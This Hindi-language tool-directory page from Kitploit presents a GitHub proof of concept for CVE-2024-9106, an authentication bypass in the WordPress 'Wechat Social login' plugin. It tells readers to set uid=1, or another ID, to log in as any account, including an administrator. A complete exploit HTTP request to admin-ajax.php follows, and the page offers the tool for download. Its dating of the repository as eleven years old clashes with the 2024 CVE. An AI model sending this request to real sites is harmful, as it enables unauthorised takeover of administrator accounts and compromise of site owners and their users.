Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-9106 — Wechat Social login <= 1.3.0 - प्रमाणीकरण बाईपास | Kitploit
उपकरण/GitHubGitHub/randomrobbiebf/cve-2024-9106
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubrandomrobbiebf/cve-2024-9106

CVE-2024-9106

Wechat Social login <= 1.3.0 - प्रमाणीकरण बाईपास

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-9106

Wechat Social login <= 1.3.0 - प्रमाणीकरण बायपास

विवरण:

वर्डप्रेस के लिए Wechat Social login प्लगइन संस्करण 1.3.0 तक (शामिल) प्रमाणीकरण बायपास के लिए असुरक्षित है। यह सोशल लॉगिन के दौरान प्रदान किए गए उपयोगकर्ता के अपर्याप्त सत्यापन के कारण है। इससे गैर-प्रमाणित हमलावरों के लिए साइट पर किसी भी मौजूदा उपयोगकर्ता (जैसे व्यवस्थापक) के रूप में लॉग इन करना संभव हो जाता है, यदि उनके पास उपयोगकर्ता आईडी तक पहुंच हो। यह केवल तभी शोषण योग्य है जब ऐप सीक्रेट सेट न हो, इसलिए इसका डिफ़ॉल्ट खाली मान होता है। बस uid=1 जोड़ें या आईडी नंबर को उस खाते में बदलें जिसमें आप लॉगिन करना चाहते हैं। केवल wechat के लिए काम करता है।

root@kitploit:~
CVE: CVE-2024-9106
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: wechat-social-login

POC

root@kitploit:~
GET /wp-admin/admin-ajax.php?channel_id=social_weibo&action=xh_social_channel&uid=1&tab=login_redirect_to_authorization_uri&xh_social_channel=8e7bec203c&notice_str=1773207877&hash=4165e284f73b86c0c642973816d0cd17&redirect_to=http%3A%2F%2Fkubernetes.docker.internal%2Fwp-admin%2F HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
टूल डाउनलोड करें